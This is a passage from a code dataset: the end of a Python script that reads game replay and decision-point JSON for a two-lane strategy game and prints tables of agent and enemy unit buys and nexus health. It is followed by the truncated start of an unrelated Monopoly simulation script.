utils.get_json_tree_filenames_etc(game_dir_path)\n print(\"\")\n dp_infos = []\n #for i in range(len(files) - 7, len(files)):\n for fname_etc in fnames_etc:\n dp_info = get_dp_info(fname_etc.path)\n dp_infos.append(dp_info)\n deduce_enemy_actions(dp_infos)\n log_agent_story(dp_infos)\n # note_misspent_units(dp_infos)\n replay_json_info = get_info_from_replay_json(get_path_for_replay_json(replay_name, game_dir_path))\n express_infos(dp_infos, replay_name, replay_json_info)\n\ndef get_path_for_replay_json(replay_name, game_dir_path):\n trees_dir = os.path.dirname(game_dir_path)\n osu_xai_sc2ui_dir = os.path.dirname(trees_dir)\n replays_dir = os.path.join(osu_xai_sc2ui_dir,\"replays\")\n replays_game_dir= os.path.join(replays_dir,replay_name)\n replay_filename = replay_name + \".json\"\n replay_path = os.path.join(replays_game_dir, replay_filename)\n print(\"derived replay json pathname as \" + replay_path)\n return replay_path\n\n\ndef center(w, s):\n if len(s) >= w:\n return s\n else:\n diff = w - len(s)\n half_diff = int(diff / 2)\n for i in range(half_diff):\n s = \" \" + s\n return s\n\n#\t Agent Top--------------|Enemy Top------------------|Agent Enemy Agent Bottom Enemy Bottom\n# M,B,I + \t NEX NEX M,B,I + \n#DP01 4,0,0 1 - - 100 : 100 0,1,0 - - - \n#DP02 5,0,0 - - - : 3 - - \n#DP03 - - - 97 : 3,1,0 1 - -\n#DP04 - 1 - : 4,1,0 - - 1\n#DP05 5,1,0 - 1 - : \n#DP06 5,2,0 1 - - : \n#DP07 6,2,0 - - - 95 : \n\nfr_top_has_keys = [\"friendly.has.baneling.top\", \"friendly.has.marine.top\", \"friendly.has.immortal.top\"]\nfr_bot_has_keys = [\"friendly.has.baneling.bottom\",\"friendly.has.marine.bottom\",\"friendly.has.immortal.bottom\"]\n\nfr_top_buys_keys = [\"friendly.buys.baneling.top\", \"friendly.buys.marine.top\", \"friendly.buys.immortal.top\"]\nfr_bot_buys_keys = [\"friendly.buys.baneling.bottom\",\"friendly.buys.marine.bottom\",\"friendly.buys.immortal.bottom\"]\n\nen_top_has_keys = [\"enemy.has.baneling.top\", \"enemy.has.marine.top\", \"enemy.has.immortal.top\"]\nen_bot_has_keys = [\"enemy.has.baneling.bottom\",\"enemy.has.marine.bottom\",\"enemy.has.immortal.bottom\"]\n\nen_top_buys_keys = [\"enemy.buys.baneling.top\", \"enemy.buys.marine.top\", \"enemy.buys.immortal.top\"]\nen_bot_buys_keys = [\"enemy.buys.baneling.bottom\",\"enemy.buys.marine.bottom\",\"enemy.buys.immortal.bottom\"]\nstory_col_width = 10\n\n# keys\n# fth : friendly top has\n# ftb : friendly top buys\n# fbh : friendly bot has\n# fbb : friendly bot buys\n# fph : friendly pyl has\n# fpb : friendly pyl buys\n# \n# eth : enemy top has\n# etb : enemy top buys\n# ebh : enemy bot has\n# ebb : enemy bot buys\n# eph : enemy pyl has\n# epb : enemy pyl buys\n# \n# ftn : friendly top nexus\n# fbn : friendly bot nexus\n# etn : enemy top nexus\n# ebn : enemy bot nexus\n\nplayer_hdrs = {}\nplayer_hdrs[\"col_dp\"] = \" \"\nplayer_hdrs[\"col_fth\"] = \"Agent\"\nplayer_hdrs[\"col_ftb\"] = \"Agent\"\nplayer_hdrs[\"col_fbh\"] = \"Agent\"\nplayer_hdrs[\"col_fbb\"] = \"Agent\"\nplayer_hdrs[\"col_fph\"] = \"Agent\"\nplayer_hdrs[\"col_fpb\"] = \"Agent\"\nplayer_hdrs[\"col_eph\"] = \"Enemy\"\nplayer_hdrs[\"col_epb\"] = \"Enemy\"\nplayer_hdrs[\"col_eth\"] = \"Enemy\"\nplayer_hdrs[\"col_etb\"] = \"Enemy\"\nplayer_hdrs[\"col_ebh\"] = \"Enemy\"\nplayer_hdrs[\"col_ebb\"] = \"Enemy\"\n\nplayer_hdrs[\"col_ftn\"] = \"Agent\"\nplayer_hdrs[\"col_fbn\"] = \"Agent\"\nplayer_hdrs[\"col_etn\"] = \"Enemy\"\nplayer_hdrs[\"col_ebn\"] = \"Enemy\"\nplayer_hdrs[\"fr_mineral\"] = \"Agent\"\n\nplayer_hdrs[\"agent_story\"] = center(story_col_width,\"Agent\")\n\nlane_hdrs = {}\nlane_hdrs[\"col_dp\"] = \" \"\nlane_hdrs[\"col_fth\"] = \" T \"\nlane_hdrs[\"col_ftb\"] = \" T \"\nlane_hdrs[\"col_fbh\"] = \" B \"\nlane_hdrs[\"col_fbb\"] = \" B \"\nlane_hdrs[\"col_fph\"] = \" PYL\"\nlane_hdrs[\"col_fpb\"] = \" PYL\"\nlane_hdrs[\"col_eph\"] = \" PYL\"\nlane_hdrs[\"col_epb\"] = \" PYL\"\nlane_hdrs[\"col_eth\"] = \" T \"\nlane_hdrs[\"col_etb\"] = \" T \"\nlane_hdrs[\"col_ebh\"] = \" B \"\nlane_hdrs[\"col_ebb\"] = \" B \"\n\nlane_hdrs[\"col_ftn\"] = \" T \"\nlane_hdrs[\"col_fbn\"] = \" B \"\nlane_hdrs[\"col_etn\"] = \" T \"\nlane_hdrs[\"col_ebn\"] = \" B \"\n\nlane_hdrs[\"agent_story\"] = center(story_col_width,\"story\")\nlane_hdrs[\"fr_mineral\"] = \"Min-\"\n\n\ntype_hdrs = {}\ntype_hdrs[\"col_dp\"] = \" \"\ntype_hdrs[\"col_fth\"] = \" has\"\ntype_hdrs[\"col_ftb\"] = \"buys\"\ntype_hdrs[\"col_fbh\"] = \" has\"\ntype_hdrs[\"col_fbb\"] = \"buys\"\ntype_hdrs[\"col_fph\"] = \" has\"\ntype_hdrs[\"col_fpb\"] = \"buys\"\ntype_hdrs[\"col_eph\"] = \" has\"\ntype_hdrs[\"col_epb\"] = \"buys\"\ntype_hdrs[\"col_eth\"] = \" has\"\ntype_hdrs[\"col_etb\"] = \"buys\"\ntype_hdrs[\"col_ebh\"] = \" has\"\ntype_hdrs[\"col_ebb\"] = \"buys\"\n\ntype_hdrs[\"col_ftn\"] = \" nex \"\ntype_hdrs[\"col_fbn\"] = \" nex \"\ntype_hdrs[\"col_etn\"] = \" nex \"\ntype_hdrs[\"col_ebn\"] = \" nex \"\ntype_hdrs[\"agent_story\"] = \" \"\ntype_hdrs[\"fr_mineral\"] = \"eral\"\n\ncol_order = [\"col_dp\", # DP\n \"fr_mineral\", #friendly mineral\n \"agent_story\", # agent story\n \"col_fpb\", # friendly pylon buys\n \"col_fph\", # friendly pylon has\n\n \"col_fth\", # friendly top has \n \"col_ftb\", # friendly top buys \n \"col_etn\", # enemy top nexus\n\n \"col_fbh\", # friendly bot has \n \"col_fbb\", # friendly bot buys\n \"col_ebn\", # enemy bot nexus\n\n \"col_eph\", # enemy pylon has \n \"col_epb\", # enemy pylon buys \n\n \"col_eth\", # enemy top has \n \"col_etb\", # enemy top buys \n \"col_ftn\", # friendly top nexus\n\n \"col_ebh\", # enemy bot has \n \"col_ebb\", # enemy bot buys\n \"col_fbn\"] # friendly bot nexus\n \n\n# fph - friendly pylon has\n# fpb - friendly pylon buys\n\ndef express_infos(dp_infos, replay_name, replay_json_info):\n print(\"\")\n col_vals_for_dp = {}\n for i in range(len(dp_infos)):\n #col_dp = \"DP\" + utils.ensure_two_digits(i + 28) + \" \"\n col_dp = \"DP\" + utils.ensure_two_digits(i) + \" \"\n di = dp_infos[i]\n col_fth = get_has_column (di, fr_top_has_keys)\n col_ftb = get_buys_column(di, fr_top_buys_keys)\n\n col_fbh = get_has_column (di, fr_bot_has_keys)\n col_fbb = get_buys_column(di, fr_bot_buys_keys)\n\n col_eth = get_has_column (di, en_top_has_keys)\n col_etb = get_buys_column(di, en_top_buys_keys)\n\n col_ebh = get_has_column (di, en_bot_has_keys)\n col_ebb = get_buys_column(di, en_bot_buys_keys)\n\n col_fph = get_pylon_has_value(int(di[\"friendly.has.pylon\"]))\n col_fpb = get_pylon_action_string(di[\"friendly.buys.pylon\"])\n col_eph = get_pylon_has_value(int(di[\"enemy.has.pylon\"]))\n col_epb = get_pylon_action_string(di[\"enemy.buys.pylon\"])\n\n col_vals = {}\n col_vals[\"col_dp\"] = col_dp\n #friendly\n col_vals[\"col_fth\"] = col_fth\n col_vals[\"col_ftb\"] = col_ftb\n col_vals[\"col_fbh\"] = col_fbh\n col_vals[\"col_fbb\"] = col_fbb\n #enemy\n col_vals[\"col_eth\"] = col_eth\n col_vals[\"col_etb\"] = col_etb\n col_vals[\"col_ebh\"] = col_ebh\n col_vals[\"col_ebb\"] = col_ebb\n #friendly pylons\n col_vals[\"col_fph\"] = col_fph\n col_vals[\"col_fpb\"] = col_fpb\n #enemy_pylons\n col_vals[\"col_eph\"] = col_eph\n col_vals[\"col_epb\"] = col_epb\n\n # nexi\n col_vals[\"col_ftn\"] = pad_to_width(6,get_percent_health(di[\"friendly.top.nexus\"]))\n col_vals[\"col_fbn\"] = pad_to_width(6,get_percent_health(di[\"friendly.bot.nexus\"]))\n col_vals[\"col_etn\"] = pad_to_width(6,get_percent_health(di[\"enemy.top.nexus\"]))\n col_vals[\"col_ebn\"] = pad_to_width(6,get_percent_health(di[\"enemy.bot.nexus\"]))\n\n # agent story\n col_vals[\"agent_story\"] = center(story_col_width, di[\"agent_story\"] )\n col_vals[\"fr_mineral\"] = pad_to_width(6,str(int(di[\"unspent_mineral\"])))\n col_vals_for_dp[i] = col_vals\n \n max_width_col_vals = get_max_width_col_vals(col_vals_for_dp, len(dp_infos))\n print(\"\")\n print(\"replay name : \" + replay_name + \" unit sequence: b,m,i\")\n print(\"\")\n print_row(max_width_col_vals,player_hdrs)\n print_row(max_width_col_vals,lane_hdrs)\n print_row(max_width_col_vals,type_hdrs)\n print(\"\")\n for i in range(len(dp_infos)):\n col_vals = col_vals_for_dp[i]\n print_row(max_width_col_vals,col_vals)\n \n # print the final nexus scores\n final_col_vals = {}\n for col_key in col_order:\n final_col_vals[col_key] = \" \"\n\n final_col_vals[\"col_ftn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"friendly.nexusHealth.top_final\"]))\n final_col_vals[\"col_fbn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"friendly.nexusHealth.bottom_final\"]))\n final_col_vals[\"col_etn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"enemy.nexusHealth.top_final\"]))\n final_col_vals[\"col_ebn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"enemy.nexusHealth.bottom_final\"]))\n\n print_row(max_width_col_vals, final_col_vals)\n\n\n\ndef get_percent_health(val):\n percent = int((val * 100) / 2000)\n percent_str = str(percent)\n for i in range(3 - len(percent_str)):\n percent_str = \" \" + percent_str\n return percent_str\n\ndef get_max_width_col_vals(col_vals_for_dp, dp_count):\n max_width_col_vals = {}\n for col_key in col_order:\n max_width_col_vals[col_key] = \"\"\n for i in range(dp_count):\n col_vals = col_vals_for_dp[i]\n for col_key in col_order:\n if len(col_vals[col_key]) > len(max_width_col_vals[col_key]):\n max_width_col_vals[col_key] = col_vals[col_key]\n return max_width_col_vals\n\ndef get_pylon_has_value(count):\n result = \" \"\n if count == 0:\n return result\n for i in range(count):\n result= result + \"P\"\n return pad_to_width(6,result)\n\ndef print_row(col_vals,col_data):\n line = \"\"\n for col_key in col_order:\n header_entry = pad_to_width(len(col_vals[col_key]),col_data[col_key])\n line = line + header_entry\n print(line)\n\ndef pad_to_width(w,s):\n while len(s) < w:\n s = s +\" \"\n return s\n\ndef get_has_column(di, keys):\n return str(int(di[keys[0]]))+\",\" + str(int(di[keys[1]]))+ \",\" + str(int(di[keys[2]])) + \" \"\n\ndef get_buys_column(di, keys):\n return get_action_string(di[keys[0]],di[keys[1]],di[keys[2]]) + \" \"\n\ndef get_pylon_action_string(a):\n if a == \"?\":\n return pad_to_width(6,\" ?\")\n else:\n result = \" \"\n if a > 0:\n count = int(a)\n for i in range(count):\n result = result + \"P\"\n return pad_to_width(6,result)\n\ndef get_action_string(a,b,c):\n if a == \"?\":\n return \"?,?,?\"\n a_str = \"-\"\n b_str = \"-\"\n c_str = \"-\"\n if a > 0:\n a_str = str(int(a))\n if b > 0:\n b_str = str(int(b))\n if c > 0:\n c_str = str(int(c))\n return a_str + \" \" + b_str + \" \" + c_str\n\n#B -> M -> I\n#\n# top: b12+4 -> m22 ; m22+3 -> \n#\n# rps_story[\"marine->immortal\"\n# rps_target[\"immortal\"] = \"baneling\"\n# rps_target[\"baneling\"] = \"marine\"\n\n\n# rps_vulnerable_to[\"marine\"] = \"baneling\"\n# rps_vulnerable_to[\"immortal\"] = \"marine\"\n# rps_vulnerable_to[\"baneling\"] = \"immortal\"\n\n# def note_misspent_units(dp_infos):\n# note_misspent_unit(dp_infos,\"marine\",\"top\")\n\n\n# def note_rps_counters(dp_infos,type,lane):\n# for di in dp_infos:\n\n\n\n\n\ndef log_agent_story(dp_infos):\n for di in dp_infos:\n mt = di[\"friendly.buys.marine.top\"] \n bt = di[\"friendly.buys.baneling.top\"] \n it = di[\"friendly.buys.immortal.top\"] \n mb = di[\"friendly.buys.marine.bottom\"] \n bb = di[\"friendly.buys.baneling.bottom\"] \n ib = di[\"friendly.buys.immortal.bottom\"]\n pylons = di[\"friendly.buys.pylon\"]\n total_units_bought = mt + bt + it + mb + bb +ib\n if total_units_bought == 0 and pylons == 0:\n di[\"agent_story\"] = \"save\"\n else:\n lane = get_lane_for_action(mt,bt,it,mb,bb,ib)\n action = get_action_string_from_friendly_buys(lane,mt,bt,it,mb,bb,ib)\n story = lane + \" \" + action\n di[\"agent_story\"] = story\n \ndef get_action_string_from_friendly_buys(lane,mt,bt,it,mb,bb,ib):\n if lane == \" \":\n return \"-,-,-\"\n elif lane == \"T \":\n return str(int(bt)) + \",\" + str(int(mt)) + \",\" + str(int(it))\n else: \n return str(int(bb)) + \",\" + str(int(mb)) + \",\" + str(int(ib))\n\n\ndef get_lane_for_action(mt,bt,it,mb,bb,ib):\n top_count = mt + bt + it\n bot_count = mb + bb + ib\n if (top_count == 0 and bot_count == 0):\n return \" \"\n if(top_count > 0):\n return \"T \"\n else:\n return \" B\"\n\ndef deduce_enemy_actions(dp_infos):\n for i in range(len(dp_infos)-1):\n cur = dp_infos[i]\n next = dp_infos[i+1]\n enemy_buys_marine_top = next[\"enemy.has.marine.top\"] - cur[\"enemy.has.marine.top\"]\n enemy_buys_baneling_top = next[\"enemy.has.baneling.top\"] - cur[\"enemy.has.baneling.top\"]\n enemy_buys_immortal_top = next[\"enemy.has.immortal.top\"] - cur[\"enemy.has.immortal.top\"]\n enemy_buys_marine_bottom = next[\"enemy.has.marine.bottom\"] - cur[\"enemy.has.marine.bottom\"]\n enemy_buys_baneling_bottom = next[\"enemy.has.baneling.bottom\"] - cur[\"enemy.has.baneling.bottom\"]\n enemy_buys_immortal_bottom = next[\"enemy.has.immortal.bottom\"] - cur[\"enemy.has.immortal.bottom\"]\n enemy_buys_pylon = next[\"enemy.has.pylon\"] - cur[\"enemy.has.pylon\"]\n cur[\"enemy.buys.marine.top\"] = enemy_buys_marine_top\n cur[\"enemy.buys.baneling.top\"] = enemy_buys_baneling_top\n cur[\"enemy.buys.immortal.top\"] = enemy_buys_immortal_top\n cur[\"enemy.buys.marine.bottom\"] = enemy_buys_marine_bottom\n cur[\"enemy.buys.baneling.bottom\"] = enemy_buys_baneling_bottom\n cur[\"enemy.buys.immortal.bottom\"] = enemy_buys_immortal_bottom\n cur[\"enemy.buys.pylon\"] = enemy_buys_pylon\n \n next[\"enemy.buys.marine.top\"] = \"?\"\n next[\"enemy.buys.baneling.top\"] = \"?\"\n next[\"enemy.buys.immortal.top\"] = \"?\"\n next[\"enemy.buys.marine.bottom\"] = \"?\"\n next[\"enemy.buys.baneling.bottom\"] = \"?\"\n next[\"enemy.buys.immortal.bottom\"] = \"?\"\n next[\"enemy.buys.pylon\"] = \"?\"\n\ndef get_dp_info(path):\n with open(path) as json_file:\n root = json.load(json_file)\n print(\".\" , end = '', flush = True)\n info = {}\n state = root[\"state\"] \n info[\"unspent_mineral\"] = state[0] \n info[\"friendly.has.marine.top\"] = state[1]\n info[\"friendly.has.baneling.top\"] = state[2]\n info[\"friendly.has.immortal.top\"] = state[3]\n info[\"friendly.has.marine.bottom\"] = state[4]\n info[\"friendly.has.baneling.bottom\"] = state[5]\n info[\"friendly.has.immortal.bottom\"] = state[6]\n\n info[\"enemy.has.marine.top\"] = state[8]\n info[\"enemy.has.baneling.top\"] = state[9]\n info[\"enemy.has.immortal.top\"] = state[10]\n info[\"enemy.has.marine.bottom\"] = state[11]\n info[\"enemy.has.baneling.bottom\"] = state[12]\n info[\"enemy.has.immortal.bottom\"] = state[13]\n\n info[\"friendly.has.pylon\"] = state[7]\n info[\"enemy.has.pylon\"] = state[14]\n\n info[\"friendly.top.nexus\"] = state[63]\n info[\"friendly.bot.nexus\"] = state[64]\n info[\"enemy.top.nexus\"] = state[65]\n info[\"enemy.bot.nexus\"] = state[66]\n\n friendly_action = tree_utils.get_chosen_action(root)\n action = friendly_action[\"action\"]\n info[\"friendly.buys.marine.top\"] = action[0]\n info[\"friendly.buys.baneling.top\"] = action[1]\n info[\"friendly.buys.immortal.top\"] = action[2]\n info[\"friendly.buys.marine.bottom\"] = action[3]\n info[\"friendly.buys.baneling.bottom\"] = action[4]\n info[\"friendly.buys.immortal.bottom\"] = action[5]\n info[\"friendly.buys.pylon\"] = action[6]\n \n #prime the agent story bin\n info[\"agent_story\"] = \"\"\n return info\n\n\n\n\n\n\ndef get_info_from_replay_json(replay_json_path):\n info = {}\n with open(replay_json_path) as json_file:\n frame_infos = json.load(json_file)\n frame = {}\n for frame in frame_infos:\n pass\n nexus_units = get_nexus_units(frame)\n info[\"friendly.nexusHealth.top_final\"] = get_nexus_health_for_unit(1,\"top\",nexus_units)\n info[\"friendly.nexusHealth.bottom_final\"] = get_nexus_health_for_unit(1,\"bottom\",nexus_units)\n info[\"enemy.nexusHealth.top_final\"] = get_nexus_health_for_unit(4,\"top\",nexus_units)\n info[\"enemy.nexusHealth.bottom_final\"] = get_nexus_health_for_unit(4,\"bottom\",nexus_units)\n return info\n \n\n\ndef get_nexus_units(frameInfo):\n nexus_unit = 59\n nexus_units = []\n for unit in frameInfo[\"units\"]:\n if unit[\"unit_type\"] == nexus_unit:\n nexus_units.append(unit)\n return nexus_units\n\n\ndef get_nexus_health_for_unit(alliance, lane, nexusUnits):\n for unit in nexusUnits:\n cur_lane = get_unit_lane(unit[\"y\"])\n cur_alliance = unit[\"alliance\"]\n if alliance == cur_alliance and cur_lane == lane:\n return unit[\"health\"]\n return 0\n\n\n\ndef get_unit_lane(unit_y_pos):\n lane = \"bottom\"\n if (unit_y_pos > 32):\n lane = \"top\"\n return lane\n\n\n\n\n\n\n\n# dp_frames = []\n\n# def show_activity_via_replay_json(replay_json_path):\n# with open(replay_json_path) as json_file:\n# frame_infos = json.load(json_file)\n# set_dp_frames(frame_infos)\n# add_wave_triggered_to_frames(frame_infos)\n# add_unit_counts_to_frames(frame_infos)\n# add_unit_deltas_to_frames(frame_infos)\n\n\n\n\n# unit_info_keys = [\n# \"friendly.marineBuilding.top\",\n# \"friendly.banelingBuilding.top\",\n# \"friendly.immortalBuilding.top\",\n# \"friendly.marineBuilding.bottom\",\n# \"friendly.banelingBuilding.bottom\",\n# \"friendly.immortalBuilding.bottom\",\n# \"enemy.marineBuilding.top\",\n# \"enemy.banelingBuilding.top\",\n# \"enemy.immortalBuilding.top\",\n# \"enemy.marineBuilding.bottom\",\n# \"enemy.banelingBuilding.bottom\",\n# \"enemy.immortalBuilding.bottom\",\n# \"friendly.Pylon\",\n# \"enemy.Pylon\"\n# ]\n\n# unit_id_for_key = {}\n# unit_id_for_key[\"friendly.marineBuilding.top\"] = 21\n# unit_id_for_key[\"friendly.banelingBuilding.top\"] = 28\n# unit_id_for_key[\"friendly.immortalBuilding.top\"] = 70\n# unit_id_for_key[\"friendly.marineBuilding.bottom\"] = 21\n# unit_id_for_key[\"friendly.banelingBuilding.bottom\"] = 28\n# unit_id_for_key[\"friendly.immortalBuilding.bottom\"] = 70\n# unit_id_for_key[\"enemy.marineBuilding.top\"] = 21\n# unit_id_for_key[\"enemy.banelingBuilding.top\"] = 28\n# unit_id_for_key[\"enemy.immortalBuilding.top\"] = 70\n# unit_id_for_key[\"enemy.marineBuilding.bottom\"] = 21\n# unit_id_for_key[\"enemy.banelingBuilding.bottom\"] = 28\n# unit_id_for_key[\"enemy.immortalBuilding.bottom\"] = 70\n# unit_id_for_key[\"friendly.Pylon\"] = 60\n# unit_id_for_key[\"enemy.Pylon\"] = 60\n\n\n# alliance_for_key = {}\n# alliance_for_key[\"friendly.marineBuilding.top\"] = 1\n# alliance_for_key[\"friendly.banelingBuilding.top\"] = 1\n# alliance_for_key[\"friendly.immortalBuilding.top\"] = 1\n# alliance_for_key[\"friendly.marineBuilding.bottom\"] = 1\n# alliance_for_key[\"friendly.banelingBuilding.bottom\"] = 1\n# alliance_for_key[\"friendly.immortalBuilding.bottom\"] = 1\n# alliance_for_key[\"enemy.marineBuilding.top\"] = 4\n# alliance_for_key[\"enemy.banelingBuilding.top\"] = 4\n# alliance_for_key[\"enemy.immortalBuilding.top\"] = 4\n# alliance_for_key[\"enemy.marineBuilding.bottom\"] = 4\n# alliance_for_key[\"enemy.banelingBuilding.bottom\"] = 4\n# alliance_for_key[\"enemy.immortalBuilding.bottom\"] = 4\n# alliance_for_key[\"friendly.Pylon\"] = 1\n# alliance_for_key[\"enemy.Pylon\"] = 4\n\n\n# lane_for_key = {}\n# lane_for_key[\"friendly.marineBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.banelingBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.immortalBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.marineBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.banelingBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.immortalBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.marineBuilding.top\"] = \"top\"\n# lane_for_key[\"enemy.banelingBuilding.top\"] = \"top\"\n# lane_for_key[\"enemy.immortalBuilding.top\"] = \"top\"\n# lane_for_key[\"enemy.marineBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.banelingBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.immortalBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.Pylon\"] = \"\" #NA\n# lane_for_key[\"enemy.Pylon\"] = \"\" #NA\n\n\n# def add_unit_counts_to_frames(frame_infos):\n# prev_wave_counts = {}\n# prev_frame = {}\n# for key in unit_info_keys:\n# print(\"add_unit_counts ... key \" + key)\n# count_key = key +\"_count\"\n# at_first_frame_to_skip = True\n# for frame in frame_infos:\n# if at_first_frame_to_skip:\n# at_first_frame_to_skip = False\n# prev_frame = frame\n# continue\n# frame[count_key] = 0\n# unit_id = unit_id_for_key[key]\n# print(\"...frame \" + str(frame[\"frame_number\"]) + \" unit id \" + str(unit_id) + \"... key \" + key)\n# lane = lane_for_key[key]\n# alliance = alliance_for_key[key]\n# units = frame[\"units\"]\n# for unit in units:\n# cur_unit_id = unit[\"unit_type\"]\n# if cur_unit_id == 45: # skip the sensor unit types\n# continue\n# cur_alliance = unit[\"alliance\"]\n# if cur_unit_id == 60:\n# cur_lane = \"NA\"\n# else:\n# cur_lane = get_unit_lane(unit[\"y\"])\n# if cur_unit_id == unit_id and cur_alliance == alliance:\n# if cur_lane == \"NA\" or cur_lane == lane:\n# if cur_alliance == 4 and frame[\"wave_triggered\"] == 1 and prev_frame[\"wave_triggered\"] == 0:\n# if count_key in prev_frame:\n# prev_wave_counts[count_key] = prev_frame[count_key]\n# else:\n# prev_frame[count_key] = 0\n# prev_wave_counts[count_key] = prev_frame[count_key]\n# if prev_wave_counts != -1:\n# frame[count_key] = prev_wave_counts[count_key]\n# else:\n# frame[count_key] += 1\n# prev_frame[count_key] = frame[count_key]\n\n# def add_unit_deltas_to_frames(frame_infos):\n# delta_key_counters = {}\n# for key in unit_info_keys:\n# looking_at_first_frame = True\n# prev_frame = {} # make empty one so VS code doesn't complain about use before assignment\n# count_key = key +\"_count\"\n# delta_key = key + \"_delta\"\n# delta_counter_key = key + \"_delta_count\"\n# for frame in frame_infos:\n# frame[delta_key] = 0\n# frame[delta_key + \"_triggered\"] = 0\n\n# if not looking_at_first_frame:\n# if prev_frame[count_key] < frame[count_key]:\n# frame[delta_key] = frame[count_key] - prev_frame[count_key]\n# frame[delta_key + \"_triggered\"] = 1\n# delta_key_counters[delta_counter_key] = 1\n# else :\n# # no difference between frames\n# cur_count = delta_key_counters[delta_counter_key]\n# if cur_count == -1:\n# delta_key_counters[delta_counter_key] = 0\n# frame[delta_key + \"_triggered\"] = 0\n# elif cur_count != 0:\n# cur_count += 1\n# # console.log(key + \" frame \" + frameIndex + \" curCount \" + curCount)\n# if cur_count > 85: # chose 90 to be far enough past when we toggle on the unit additions , which was 10 past the DP\n# delta_key_counters[delta_counter_key] = 0\n# #console.log(key + \" frame \" + frameIndex + \" resetting to 0\")\n# frame[delta_key + \"_triggered\"] = 0\n# else:\n# delta_key_counters[delta_counter_key] = cur_count\n# frame[delta_key] = prev_frame[delta_key]\n# frame[delta_key + \"_triggered\"] = 1\n# # console.log(key + \" frame \" + frameIndex + \" applying prior delta\")\n# prev_frame = frame\n\n# def add_wave_triggered_to_frames(frame_infos):\n# key = \"wave_triggered\"\n# count = -1\n# for i in range(len(frame_infos) -1):\n# cur_frame = frame_infos[i]\n# next_frame = frame_infos[i+1]\n# cur_units = cur_frame[\"units\"]\n# next_units = next_frame[\"units\"]\n# cur_frame_wave_number = -1\n# next_frame_wave_number = -1\n# for cur_unit in cur_units:\n# if cur_unit[\"unit_type\"] == 45:\n# if cur_unit[\"shield\"] == 42:\n# cur_frame_wave_number = cur_unit[\"health\"] - 1 #first wave is 0\n# for next_unit in next_units:\n# if next_unit[\"unit_type\"] == 45:\n# if next_unit[\"shield\"] == 42:\n# next_frame_wave_number = next_unit[\"health\"] - 1 #first wave is 0\n# if next_frame_wave_number > cur_frame_wave_number:\n# next_frame[key] = 1\n# print(\"wave_triggered added to frame \" + str(i))\n# count = 0\n# elif count != -1 and count <= 40:\n# print(\"wave_triggered added to frame \" + str(i))\n# next_frame[key] = 1\n# count += 1\n# else:\n# next_frame[key] = 0\n\n\n# def extract_unit_values(frame_info, activity):\n# fi = frame_info\n# if is_frame_far_enough_past_dp(fi):\n# for unit_info_key in unit_info_keys:\n# if fi[unit_info_key + \"_delta_triggered\"] == 1:\n# if \"friendly\" in unit_info_key:\n# activity[unit_info_key + \"_delta\"] = fi[unit_info_key + \"_delta\"]\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"] - fi[unit_info_key + \"_delta\"]\n# activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# if frame_info['wave_triggered'] == 1:\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"]\n# #activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# if \"friendly\" in unit_info_key:\n# activity[unit_info_key + \"_delta\"] = \"\" #NA\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"]\n# activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# activity[unit_info_key + \"_count\"] = (fi[unit_info_key + \"_count\"])\n# #activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n\n \n# nexus_units = get_nexus_units(frame_info)\n# activity[\"friendly.nexusHealth.top\"] = get_nexus_health_for_unit(1,\"top\",nexus_units)\n# activity[\"friendly.nexusHealth.bottom\"] = get_nexus_health_for_unit(1,\"bottom\",nexus_units)\n# activity[\"enemy.nexusHealth.top\"] = get_nexus_health_for_unit(4,\"top\",nexus_units)\n# activity[\"enemy.nexusHealth.bottom\"] = get_nexus_health_for_unit(4,\"bottom\",nexus_units)\n\n\n\n# def get_nexus_health_for_unit(alliance, lane, nexusUnits):\n# for unit in nexusUnits:\n# cur_lane = get_unit_lane(unit.y)\n# cur_alliance = unit.alliance\n# if alliance == cur_alliance and cur_lane == lane:\n# return unit.health\n# return 0\n\n# def set_dp_frames(frame_infos):\n# for fi in frame_infos:\n# if fi[\"frame_info_type\"] == \"decision_point\":\n# dp_frames.append(fi)\n\n\n# def is_frame_far_enough_past_dp(frame_info):\n# fi = frame_info\n# frame_number = fi.frame_number\n# far_enough_past_dp = 10\n# for i in range(len(dp_frames)):\n# dp_frame= dp_frames[i]\n# if i == len(dp_frames) - 1:\n# next_dp_frame = None\n# else:\n# next_dp_frame = dp_frames[i + 1]\n# window_start = dp_frame + far_enough_past_dp\n# if (next_dp_frame == None):\n# window_end = window_start + 75\n# else :\n# window_end = next_dp_frame\n# if frame_number >= window_start and frame_number <= window_end:\n# #console.log(\"frame \" + frameNumber + \" is between \"+ windowStart + \" and \" + windowEnd);\n# return True\n# return False\n\n\n# def get_current_friendly_mineral_health(frameInfo):\n# recorder_unit_id = 45\n# for unit in frameInfo.units:\n# if unit.unit_type == recorder_unit_id:\n# recorder_unit = unit\n# mineral_health_sheild_value = 4\n# if recorder_unit.shield == mineral_health_sheild_value:\n# current_friendly_mineral_health = recorder_unit.health - 1\n# return current_friendly_mineral_health\n\n","sub_path":"py/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":29884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"300005771","text":"# Tests the stability of stalemates.\nimport pickle\nfrom monopoly import *\nfrom multiprocessing import *\nimport csv\nfrom copy import deepcopy\n\ndef play_set(sample_size, game, results_q):\n game_winners = []\n\n for i in range(sample_size):\n game_to_play = deepcopy(game)\n\n # Add 10000 more turns.\n game_to_play.cutoff = 